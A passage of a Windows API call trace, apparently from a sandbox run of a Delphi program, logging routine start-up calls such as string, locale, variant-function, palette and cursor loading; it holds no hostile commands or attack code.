uID=0xffd8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xffec, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0165.642] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0165.642] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0165.642] GetVersionExA (in: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0165.642] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76220000 [0165.642] GetProcAddress (hModule=0x76220000, lpProcName="GetDiskFreeSpaceExA") returned 0x762b434f [0165.642] GetThreadLocale () returned 0x409 [0165.642] GetThreadLocale () returned 0x409 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jan") returned 4 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd78, cchData=256 | out: lpLCData="January") returned 8 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Feb") returned 4 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd78, cchData=256 | out: lpLCData="February") returned 9 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mar") returned 4 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="March") returned 6 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Apr") returned 4 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="April") returned 6 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jun") returned 4 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="June") returned 5 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jul") returned 4 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="July") returned 5 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Aug") returned 4 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="August") returned 7 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sep") returned 4 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd78, cchData=256 | out: lpLCData="September") returned 10 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Oct") returned 4 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd78, cchData=256 | out: lpLCData="October") returned 8 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Nov") returned 4 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd78, cchData=256 | out: lpLCData="November") returned 9 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Dec") returned 4 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd78, cchData=256 | out: lpLCData="December") returned 9 [0165.642] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sun") returned 4 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sunday") returned 7 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mon") returned 4 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Monday") returned 7 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tue") returned 4 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tuesday") returned 8 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wed") returned 4 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wednesday") returned 10 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thu") returned 4 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thursday") returned 9 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Fri") returned 4 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Friday") returned 7 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sat") returned 4 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Saturday") returned 9 [0165.643] GetThreadLocale () returned 0x409 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="$") returned 2 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fecc, cchData=2 | out: lpLCData=".") returned 2 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="2") returned 2 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fecc, cchData=2 | out: lpLCData="/") returned 2 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0165.643] GetThreadLocale () returned 0x409 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0165.643] GetThreadLocale () returned 0x409 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fecc, cchData=2 | out: lpLCData=":") returned 2 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="AM") returned 3 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="PM") returned 3 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0165.643] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0165.643] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76720000 [0165.643] GetProcAddress (hModule=0x76720000, lpProcName="VariantChangeTypeEx") returned 0x76724c28 [0165.643] GetProcAddress (hModule=0x76720000, lpProcName="VarNeg") returned 0x7679c802 [0165.644] GetProcAddress (hModule=0x76720000, lpProcName="VarNot") returned 0x7679ec66 [0165.644] GetProcAddress (hModule=0x76720000, lpProcName="VarAdd") returned 0x76745934 [0165.644] GetProcAddress (hModule=0x76720000, lpProcName="VarSub") returned 0x7679d332 [0165.644] GetProcAddress (hModule=0x76720000, lpProcName="VarMul") returned 0x7679dbd4 [0165.644] GetProcAddress (hModule=0x76720000, lpProcName="VarDiv") returned 0x7679e405 [0165.644] GetProcAddress (hModule=0x76720000, lpProcName="VarIdiv") returned 0x7679f00a [0165.644] GetProcAddress (hModule=0x76720000, lpProcName="VarMod") returned 0x7679f15e [0165.644] GetProcAddress (hModule=0x76720000, lpProcName="VarAnd") returned 0x76745a98 [0165.644] GetProcAddress (hModule=0x76720000, lpProcName="VarOr") returned 0x7679ecfa [0165.644] GetProcAddress (hModule=0x76720000, lpProcName="VarXor") returned 0x7679ee2e [0165.644] GetProcAddress (hModule=0x76720000, lpProcName="VarCmp") returned 0x7673b0dc [0165.644] GetProcAddress (hModule=0x76720000, lpProcName="VarI4FromStr") returned 0x76736fab [0165.644] GetProcAddress (hModule=0x76720000, lpProcName="VarR4FromStr") returned 0x767401a0 [0165.644] GetProcAddress (hModule=0x76720000, lpProcName="VarR8FromStr") returned 0x7673699e [0165.644] GetProcAddress (hModule=0x76720000, lpProcName="VarDateFromStr") returned 0x76746ba7 [0165.645] GetProcAddress (hModule=0x76720000, lpProcName="VarCyFromStr") returned 0x76766c12 [0165.645] GetProcAddress (hModule=0x76720000, lpProcName="VarBoolFromStr") returned 0x7673dbd1 [0165.645] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrFromCy") returned 0x76747fdc [0165.645] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrFromDate") returned 0x76737a2a [0165.645] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrFromBool") returned 0x76740355 [0165.645] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8 [0165.645] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xac [0165.645] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb0 [0165.646] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x77820000 [0165.646] GetDC (hWnd=0x0) returned 0x260107b3 [0165.646] GetDeviceCaps (hdc=0x260107b3, index=90) returned 96 [0165.646] ReleaseDC (hWnd=0x0, hDC=0x260107b3) returned 1 [0165.646] GetDC (hWnd=0x0) returned 0x260107b3 [0165.646] GetDeviceCaps (hdc=0x260107b3, index=104) returned 0 [0165.646] ReleaseDC (hWnd=0x0, hDC=0x260107b3) returned 1 [0165.646] CreatePalette (plpal=0x18fb30) returned 0x70809ac [0165.646] GetStockObject (i=7) returned 0x1b00017 [0165.646] GetStockObject (i=5) returned 0x1900015 [0165.646] GetStockObject (i=13) returned 0x18a002e [0165.646] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0165.646] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff34, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff33, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff32, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff31, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff30, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff4f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff4e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0165.647] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0165.649] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0e7 [0165.649] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0f8 [0165.649] GetCurrentThreadId () returned 0x820 [0165.649] GlobalAddAtomA (lpString="WndProcPtr0040000000000820") returned 0xc124 [0165.658] LoadStringA (in: hInstance=0x400000, uID=0xfef3, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0165.658] LoadStringA (in: hInstance=0x400000, uID=0xfef2, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0165.658] LoadStringA (in: hInstance=0x400000, uID=0xfef1, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0165.658] LoadStringA (in: hInstance=0x400000, uID=0xfef0, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0165.658] LoadStringA (in: hInstance=0x400000, uID=0xff0f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0165.658] LoadStringA (in: hInstance=0x400000, uID=0xff0e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0165.658] LoadStringA (in: hInstance=0x400000, uID=0xff0d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0165.658] LoadStringA (in: hInstance=0x400000, uID=0xff0c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0165.658] LoadStringA (in: hInstance=0x400000, uID=0xff0b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0165.658] LoadStringA (in: hInstance=0x400000, uID=0xff0a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0165.658] LoadStringA (in: hInstance=0x400000, uID=0xff09, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0165.658] LoadStringA (in: hInstance=0x400000, uID=0xff08, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff07, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0165.659] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0165.660] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0165.660] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc1e8 [0165.660] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc1e9 [0165.660] GetVersion () returned 0x1db10106 [0165.660] GetCurrentProcessId () returned 0x818 [0165.660] GlobalAddAtomA (lpString="Delphi00000818") returned 0xc122 [0165.660] GetCurrentThreadId () returned 0x820 [0165.660] GlobalAddAtomA (lpString="ControlOfs0040000000000820") returned 0xc121 [0165.660] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000820") returned 0xc1ec [0165.660] GetProcAddress (hModule=0x77820000, lpProcName="GetMonitorInfoA") returned 0x77844413 [0165.660] GetProcAddress (hModule=0x77820000, lpProcName="GetSystemMetrics") returned 0x77837d2f [0165.660] GetSystemMetrics (nIndex=19) returned 1 [0165.768] GetSystemMetrics (nIndex=75) returned 1 [0165.768] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x1d61320, fWinIni=0x0 | out: pvParam=0x1d61320) returned 1 [0165.768] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0165.768] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0165.768] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x3028d [0165.769] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0165.769] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0165.769] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0165.769] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0xc0187 [0165.769] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x3a0271 [0165.770] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0xf0261 [0165.770] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x60287 [0165.770] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x902cf [0165.770] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x140265 [0165.770] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0165.770] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0165.770] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0165.770] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 